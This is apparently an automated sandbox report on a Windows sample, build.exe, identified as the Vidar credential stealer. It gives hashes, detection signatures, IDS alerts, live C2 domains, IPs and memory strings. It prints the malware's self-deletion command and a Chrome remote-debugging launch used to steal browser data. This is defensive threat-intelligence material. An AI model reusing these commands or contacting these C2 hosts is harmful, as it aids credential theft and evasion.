Edit tour

Windows Analysis Report
build.exe

Overview

General Information

Sample name:	build.exe
Analysis ID:	1589233
MD5:	8b54ae3edf9e8b611c27e4fdc3b2f4be
SHA1:	8f6e51fc8ae2a0b2a073391be39544d99b2ff2d2
SHA256:	b298238d73ab060de2c68fe53c8dc7479690e948d80aa8bf7a8b0e80fc6a5554
Tags:	c2exevidaruser-Lars
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

PE file has a writeable .text section

Self deletion via cmd or bat file

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

build.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\build.exe" MD5: 8B54AE3EDF9E8B611C27E4FDC3B2F4BE)

chrome.exe (PID: 5548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 --field-trial-handle=2008,i,2470610022824458282,7780640489389932804,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7692 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7776 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build.exe PID: 7144	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build.exe PID: 7144	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\build.exe", ParentImage: C:\Users\user\Desktop\build.exe, ParentProcessId: 7144, ParentProcessName: build.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5548, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T23:00:05.251359+0100	2044247	1	Malware Command and Control Activity Detected	116.203.166.124	443	192.168.2.4	49734	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T23:00:06.592798+0100	2051831	1	Malware Command and Control Activity Detected	116.203.166.124	443	192.168.2.4	49735	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T23:00:03.777259+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49733	116.203.166.124	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T23:00:02.436261+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49732	116.203.166.124	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://marka4.cyou/-	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/)	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/w	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/C	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/e	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/&	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/A	Avira URL Cloud: Label: malware
Source: https://marka4.cyou	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/l	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/p	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/b	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/ou	Avira URL Cloud: Label: malware
Source: https://marka4.cyou/_	Avira URL Cloud: Label: malware

Found malware configuration

Source: build.exe

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199816275252", "Botnet": "js4tn"}

Multi AV Scanner detection for submitted file

Source: build.exe	Virustotal: Detection: 54%			Perma Link
Source: build.exe	ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: build.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0040C009 CryptUnprotectData,

0_2_0040C009

Source: build.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.166.124:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041008C FindFirstFileA,	0_2_0041008C
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004291EA FindFirstFileA,	0_2_004291EA
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00428248 FindFirstFileA,memset,memset,	0_2_00428248
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042A4E5 FindFirstFileA,	0_2_0042A4E5
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040E749 FindFirstFileA,	0_2_0040E749
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040177C FindFirstFileA,	0_2_0040177C
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00412AC9 FindFirstFileA,	0_2_00412AC9
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040CCEA FindFirstFileA,	0_2_0040CCEA
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042BD1E FindFirstFileA,	0_2_0042BD1E
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004018DA FindFirstFileA,	0_2_004018DA

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_00428DDA GetLogicalDriveStringsA,

0_2_00428DDA

Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 10MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49733 -> 116.203.166.124:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49732 -> 116.203.166.124:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.166.124:443 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.166.124:443 -> 192.168.2.4:49734

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199816275252

Source: global traffic

HTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0040A09E recv,

0_2_0040A09E

Source: global traffic	HTTP traffic detected: GET /no111p HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: marka4.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: marka4.cyou
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----aim7glfcbie3eus00hlxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: marka4.cyouContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chromecache_61.3.dr	String found in binary or memory: http://www.broofa.com
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_64.3.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_64.3.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_61.3.dr, chromecache_64.3.dr	String found in binary or memory: https://apis.google.com
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_64.3.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_64.3.dr	String found in binary or memory: https://content.googleapis.com
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chromecache_64.3.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_61.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_61.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_61.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_61.3.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: opz5fu.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: build.exe, 00000000.00000003.1668310162.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou
Source: build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1754063208.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/
Source: build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/&
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/)
Source: build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/-
Source: build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/A
Source: build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/C
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/_
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/b
Source: build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/e
Source: build.exe, 00000000.00000003.1754063208.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/l
Source: build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/ou
Source: build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/p
Source: build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyou/w
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyouS
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyouW
Source: build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marka4.cyouw
Source: chromecache_61.3.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_64.3.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_64.3.dr	String found in binary or memory: https://plus.googleapis.com
Source: build.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199816275252
Source: build.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199816275252js4tnMozilla/5.0
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: build.exe, 00000000.00000002.2069404351.0000000003038000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1842204589.0000000003018000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: build.exe, 00000000.00000002.2069404351.0000000003013000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: build.exe, 00000000.00000002.2069404351.0000000003038000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1842204589.0000000003018000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: build.exe, 00000000.00000002.2069404351.0000000003013000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: build.exe, 00000000.00000002.2067111556.000000000057E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: build.exe	String found in binary or memory: https://t.me/no111p
Source: build.exe, 00000000.00000002.2067111556.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/no111p:
Source: build.exe	String found in binary or memory: https://t.me/no111pjs4tnMozilla/5.0
Source: build.exe, 00000000.00000003.1668310162.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: chromecache_64.3.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
